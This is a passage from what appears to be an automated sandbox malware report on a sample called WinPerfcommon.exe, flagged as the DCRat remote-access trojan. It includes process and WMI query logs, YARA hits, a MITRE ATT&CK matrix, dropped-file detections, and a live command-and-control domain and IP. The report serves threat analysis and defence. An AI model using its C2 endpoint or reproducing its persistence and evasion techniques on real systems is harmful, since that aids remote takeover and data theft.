                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Queries volume information: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe VolumeInformation
Source: C:\Recovery\SgrmBroker.exe | Queries volume information: C:\Recovery\SgrmBroker.exe VolumeInformation
Source: C:\Recovery\SgrmBroker.exe | Queries volume information: C:\Recovery\SgrmBroker.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Queries volume information: C:\Program Files\Adobe\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Queries volume information: C:\Program Files\Adobe\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Recovery\SystemSettings.exe | Queries volume information: C:\Recovery\SystemSettings.exe VolumeInformation
Source: C:\Recovery\SystemSettings.exe | Queries volume information: C:\Recovery\SystemSettings.exe VolumeInformation
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Queries volume information: C:\Users\user\Desktop\WinPerfcommon.exe VolumeInformation
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Queries volume information: C:\Users\user\Desktop\WinPerfcommon.exe VolumeInformation
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Queries volume information: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe VolumeInformation
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Queries volume information: C:\Program Files\Adobe\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001BA22000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WinPerfcommon.exe PID: 6664, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pzPgKRlGoglDaRzDTBMXwbN.exe PID: 8004, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 7100, type: MEMORYSTR
Source: Yara match | File source: WinPerfcommon.exe, type: SAMPLE
Source: Yara match | File source: 0.0.WinPerfcommon.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1682029675.0000000000302000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Recovery\SystemSettings.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\SgrmBroker.exe, type: DROPPED
Source: Yara match | File source: WinPerfcommon.exe, type: SAMPLE
Source: Yara match | File source: 0.0.WinPerfcommon.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Recovery\SystemSettings.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\SgrmBroker.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WinPerfcommon.exe PID: 6664, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pzPgKRlGoglDaRzDTBMXwbN.exe PID: 8004, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 7100, type: MEMORYSTR
Source: Yara match | File source: WinPerfcommon.exe, type: SAMPLE
Source: Yara match | File source: 0.0.WinPerfcommon.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1682029675.0000000000302000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Recovery\SystemSettings.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\SgrmBroker.exe, type: DROPPED
Source: Yara match | File source: WinPerfcommon.exe, type: SAMPLE
Source: Yara match | File source: 0.0.WinPerfcommon.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Recovery\SystemSettings.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\SgrmBroker.exe, type: DROPPED
MITRE ATT&CK Matrix (numbers preceding a technique are the matched-signature counts shown in the original matrix)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 2 File and Directory Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 2 Obfuscated Files or Information | LSASS Memory | 34 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 2 Software Packing | Security Account Manager | 241 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 151 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 133 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 151 Virtualization/Sandbox Evasion | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1589192, Sample: WinPerfcommon.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100

Start
  DNS/IP: fsin.top
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 14 other signatures
  Started: WinPerfcommon.exe; pzPgKRlGoglDaRzDTBMXwbN.exe; SgrmBroker.exe; 9 other processes

WinPerfcommon.exe
  Dropped: C:\Windows\...\pzPgKRlGoglDaRzDTBMXwbN.exe (PE32); C:\Users\user\Desktop\zsLwvutf.log (PE32); C:\Users\user\Desktop\zGtWfQBc.log (PE32); 16 other malicious files
  Signatures: Creates an undocumented autostart registry key; Creates multiple autostart registry keys; Creates an autostart registry key pointing to binary in C:\Windows; 4 other signatures
  Started: cmd.exe; csc.exe; powershell.exe; 8 other processes

pzPgKRlGoglDaRzDTBMXwbN.exe (started from Start)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

SgrmBroker.exe
  Signatures: Machine Learning detection for dropped file

cmd.exe (child of WinPerfcommon.exe)
  Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
  Started: pzPgKRlGoglDaRzDTBMXwbN.exe; 3 other processes

csc.exe (child of WinPerfcommon.exe)
  Dropped: C:\Windows\...\SecurityHealthSystray.exe (PE32)
  Signatures: Infects executable files (exe, dll, sys, html)
  Started: conhost.exe; cvtres.exe

powershell.exe (child of WinPerfcommon.exe)
  Signatures: Loading BitLocker PowerShell Module
  Started: 2 other processes

8 other processes (children of WinPerfcommon.exe)
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
  Started: schtasks.exe; schtasks.exe; schtasks.exe; 13 other processes

pzPgKRlGoglDaRzDTBMXwbN.exe (child of cmd.exe)
  DNS/IP: fsin.top 37.44.238.250, ports 49730, 49737, 62175, HARMONYHOSTING-ASFR France
  Dropped: C:\Users\user\Desktop\yHNOGCAC.log (PE32); C:\Users\user\Desktop\iFHJmzLo.log (PE32); C:\Users\user\Desktop\fyKARhRs.log (PE32); 5 other malicious files
  Started: cmd.exe

cmd.exe (child of pzPgKRlGoglDaRzDTBMXwbN.exe)
  Signatures: Uses ping.exe to sleep
  Started: conhost.exe; chcp.com; PING.EXE
Source | Detection | Scanner | Label | Link
WinPerfcommon.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
WinPerfcommon.exe | 70% | Virustotal | | Browse
WinPerfcommon.exe | 100% | Avira | HEUR/AGEN.1323342 |
WinPerfcommon.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Recovery\SgrmBroker.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat | 100% | Avira | BAT/Delbat.C |
C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat | 100% | Avira | BAT/Delbat.C |
C:\Recovery\SystemSettings.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files\Adobe\StartMenuExperienceHost.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Recovery\SgrmBroker.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\GEhWIfwR.log | 100% | Joe Sandbox ML | |
C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | 100% | Joe Sandbox ML | |
C:\Recovery\SystemSettings.exe | 100% | Joe Sandbox ML | |
C:\Program Files\Adobe\StartMenuExperienceHost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\EAqnjiFq.log | 100% | Joe Sandbox ML | |
C:\Program Files\Adobe\StartMenuExperienceHost.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Recovery\SgrmBroker.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Recovery\SystemSettings.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\EAqnjiFq.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\GEhWIfwR.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\GKMojBlr.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\PipMsYLy.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\PoUdTuAY.log | 33% | ReversingLabs | Win32.Ransomware.Bitpy |
C:\Users\user\Desktop\YLyBcRbf.log | 33% | ReversingLabs | Win32.Ransomware.Bitpy |
C:\Users\user\Desktop\ZQJbcBRg.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\ZWotDWGG.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\fyKARhRs.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\iFHJmzLo.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\izcrMdWN.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\yHNOGCAC.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\zGtWfQBc.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\zsLwvutf.log | 25% | ReversingLabs | |
C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://fsin.top/javascriptCentraldownloads.php | 100% | Avira URL Cloud | phishing |
http://fsin.top/ | 100% | Avira URL Cloud | phishing |
http://fsin.top | 100% | Avira URL Cloud | phishing |
http://crl.micros- | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fsin.top | 37.44.238.250 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://fsin.top/javascriptCentraldownloads.php | true | Avira URL Cloud: phishing | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://fsin.top/ | pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003393000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000016.00000002.2849335154.0000020310213000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2934001847.000001D696DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3054085979.000001B49D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2991988808.0000022337724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.mic | powershell.exe, 0000001A.00000002.3321971491.000001D69EEA0000.00000004.00000020.00020000.00000000.sdmp | false | | high
